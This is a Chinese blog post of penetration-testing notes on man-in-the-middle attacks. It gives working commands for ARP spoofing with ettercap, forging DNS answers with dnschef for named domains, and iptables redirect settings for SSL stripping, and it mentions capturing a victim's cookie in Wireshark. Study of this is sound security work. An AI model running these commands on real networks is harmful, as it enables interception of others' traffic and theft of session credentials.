【渗透测试笔记】之【中间人攻击】

最新推荐文章于 2023-05-15 19:14:18 发布
最新推荐文章于 2023-05-15 19:14:18 发布
阅读量776 收藏 3
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/107744925
版权

ARP 欺骗

  1. 启动路由转发
sysctl -w net.ipv4.ip_forward=1
  1. ARP 欺骗在这里插入图片描述
  2. 打开WIRESHARK 运行并过滤想要抓取的协议
    在这里插入图片描述
    抓取到的Cookie:
    在这里插入图片描述

DNS 欺骗

前提:目标DNS服务器指向你

dnschef --fakeip=180.101.49.11 --fakedomains=www.qq.com,www.sina.com --interface 192.168.2.106 -q
# fakeip:希望受害者访问的地址
# fakedomains:要欺骗的域名
# interface:本机地址

强大的Ettercap

目标格式

MAC/IPV4/IPv6/Pors
00:11:11:11:11:11:11:11/192.168.2.1//

ARP 欺骗

ettercap -Tq -M arp:remote -i eth0 /192.168.2.102// /192.168.2.1//

T:文本模式
q:安静模式
remote:双向欺骗
在这里插入图片描述

SSl 欺骗

需要先将iptables 打开

vi /etc/ettercap/etter.conf

#---------------
#     Linux 
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s %source -d %destination %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s %source -d %destination %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"

# pendant for IPv6 - Note that you need iptables v1.4.16 or newer to use IPv6 redirect
   #redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
   #redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
AA8j
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2022年全国职业院校技能大赛(职组)网络安全竞赛试题——中间人攻击渗透测试解析(详细)
旺仔Sec&blog
03-12 2116
2022年全国职业院校技能大赛(职组)网络安全竞赛试题——中间人攻击渗透测试解析(详细)
CTF 密码学应用中间人攻击
Web_boom的博客
08-09 516
中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接的两台通信计算机之间,这台计算机就称为“中间人”。本次试验地址:https://www.hetianlab.com/expc.do?wemedia。
中间人攻击 - 攻防
weixin_30865427的博客
08-09 243
SSL 检查外网网站是否安装SSL协议以及SSV版本 wosign.ssllabs.com SSL密码嗅探 sslstrip "# echo 1 > /proc/sys/net/ipv4/ip_forward # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j RED...
渗透测试--3.中间人攻击
我是个好人呀,????
05-15 1181
当心来路不明的服务供应商等人的电子邮件、即时简讯以及电话。在提供任何个人信息之前验证其可靠性和权威性;永远不要点击来自未知发送者的电子邮件的嵌入链接,如果有必要就使用搜索引擎寻找目标网站或手动输入网站URL;永远不要在未知发送者的电子邮件下载附件,如果有必要可以在保护视图打开附件,这个在许多操作系统是默认启用的;使用强大的防火墙来保护你的电脑空间,及时更新杀毒软件同时提高垃圾邮件过滤器的门槛;
中间人攻击
caijinbo
11-23 576
title: 中间人攻击 tags: 教程 author: caijinbo date: 2020-1-1 中间人攻击 概念 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接的两台通信计算机之间,这台计算机就称为“中间人”。 中间人攻击(Man-in-the-...
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
读书笔记之python渗透测试.docx
最新发布
04-13
### 读书笔记之Python渗透测试知识点汇总 #### 黑盒测试工具 1. **Burp Suite**:一种常用的集成平台,用于执行Web应用程序的安全测试。它包含多种工具,如Proxy、Intruder、Spider等,可以帮助用户发现并利用Web...
python之渗透测试笔记(一)
01-20
python之渗透测试(一)—— Socket模块Socket模块须知简介基本用法使用Socket编写一个简单的服务端和客户端 Socket模块须知 在TCP/IP协议族,Socket并不是协议,而是一个编程接口。 TCP/IP是传输层协议,主要解决...
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
渗透测试笔记.rar
02-25
这通常包括虚拟机、网络设备和各种操作系统,以便模拟实际环境并安全地进行攻击测试。"渗透测试-实验拓扑环境 2020年1月22日.pdf"可能详细介绍了如何搭建这样的环境以及在这个环境进行的实验。 4. **渗透测试技巧...
22 个出口节点对 Tor 网络发动中间人攻击
weixin_33966095的博客
06-03 353
研究人员发现了22个出口节点对Tor网络发动中间人攻击, 使用自签名的伪造证书替换有效证书,将Tor网络的加密流量转为明文流量。 在Tor匿名网络,出口节点是Tor用户访问目标网站的最后一个继,在开放互联网和加密Tor网络之间架起了一个桥梁,出口节点的维护者将知道哪些内容发送给了终端用户,如果这些内容没有加密,那么他们将能监测和审查Tor用户 的互联...
中间人攻击的技术
tzk
01-11 608
中间人攻击技术 1、Sniffing (监听) sniffing技术可以监听数据包,发了数据包,发了什么类型的数据包,数据包是怎么样的 2、Packet injection (数据包注入) 数据包注入是伪造数据包或欺骗性数据包并在两方之间预先建立的通信连接内进行干扰的过程。 这些注入的数据包看 起来是正常通信流的一部分。 它允许攻击...
web安全渗透——8(中间人攻击+ARP欺骗)end
weixin_44826485的博客
02-08 369
一、简介 当数据传输发生在一个设备(PC/手机)和网络服务器之间时,攻击者使用其技能和工具将自己置于两个端点之间并截获数据;尽管交谈的两方认为他们是在与对方交谈,但是实际上他们是在与干坏事的人交流,这便是中间人攻击。 二、思路 一般说来,有嗅探、数据包注入、会话劫持和SSL剥离四个步骤。 1,嗅探: 嗅探或数据包嗅探是一种用于捕获流进和流出系统/网络的数据包的技术。网络的数据包嗅探就好像电话的监听。记住,如果使用正确,数据包嗅探是合法的;许多公司出于“安全目的”都会使用它。 2,数据包注入: 在这种技术
【wireshark实验】分析中间人攻击
qq_44657899的博客
04-29 1735
文章目录中间人攻击的相关理论ARP欺骗的原理ARP协议的相关理论wireshark专家模式防御中间人攻击 中间人攻击的相关理论 中间人攻击的目标并不是交换机,而是终端设备(例如计算机、手机等)。在每一台终端设备都有一个ARP缓存表,这个表保存了一些IP地址和MAC地址之间的对应关系。 通常应用程序只能通过IP地址进行通信,但是在内部网络使用的交换机却不能识别IP地址。因此每一台终端设备在发送应用程序产生的数据包时,必须在它里面添加上一个MAC地址。而这个MAC地址是哪里来的呢? ARP欺骗的原理
中间人攻击原理
Elain 的渗透空间
10-31 5883
中间人攻击 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接的两台通信计算机之间,这台计算机就称为“中间人”。 中间人攻击常见的两种方法:ARP欺骗、DNS欺骗 1. DNS欺骗 目标将其DNS请求发送到攻击者这里,然后攻击
linux中间人攻击工具,Ettercap:“中间人攻击”神器
weixin_42388485的博客
05-06 1096
作者:{XJ}@ArkTeam1、Ettercap介绍Ettercap是一款开源的网络嗅探工具,是实现局域网内中间人攻击的神器,结合众多强大的插件,可以发起ARP欺骗、DNS欺骗、DHCP欺骗、会话劫持、密码嗅探等攻击活动。4种界面形式:Text是命令行界面,其启动参数为-T;Curses和GTK2是图形化界面;Daemonize是守护模式,相当于在后台运行。2种运行方式:UNIFIED是以中间人...
低功耗蓝牙(BLE)攻击分析
学者博客
11-21 3868
前言 蓝牙是一种短距的无线通讯技术,可实现固定设备、移动设备之间的数据交换。可以说蓝牙是当今世界上,最受欢迎和使用最为广泛的无线技术之一。随着物联网的快速发展,蓝牙技术也加速了其发展步伐以适应不断增长的市场和用户需求。蓝牙特别兴趣小组(SIG)正不断努力提高蓝牙的传输速度,以让蓝牙技术更好的融合于各种物联网设备当。 低功耗蓝牙(BLE)是蓝牙4.0规范的一部分,其包括传统蓝牙和蓝牙高速协议。...
Web安全培训班作业 | WireShark抓包分析&ettercapdns中间人攻击
Ms08067安全实验室
08-27 331
文章来源|MS08067 Web安全培训班第1节课作业本文作者:sererdipity(Web安全培训班1期学员)按老师要求尝试完成布置的作业如下:1、使用WireShark抓包,根据实际...
rip认证特性及安全 中间人攻击 hacker 明文密文理论
weixin_45821358的博客
03-06 742
那么在这些pc可能就会有一个黑客 ,他给边界发一个更新,里面包含默认路由,度量值设特别低,会导致这台路由器通过边界收到的默认路由,被黑客发送的默认路由覆盖掉了,结果
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值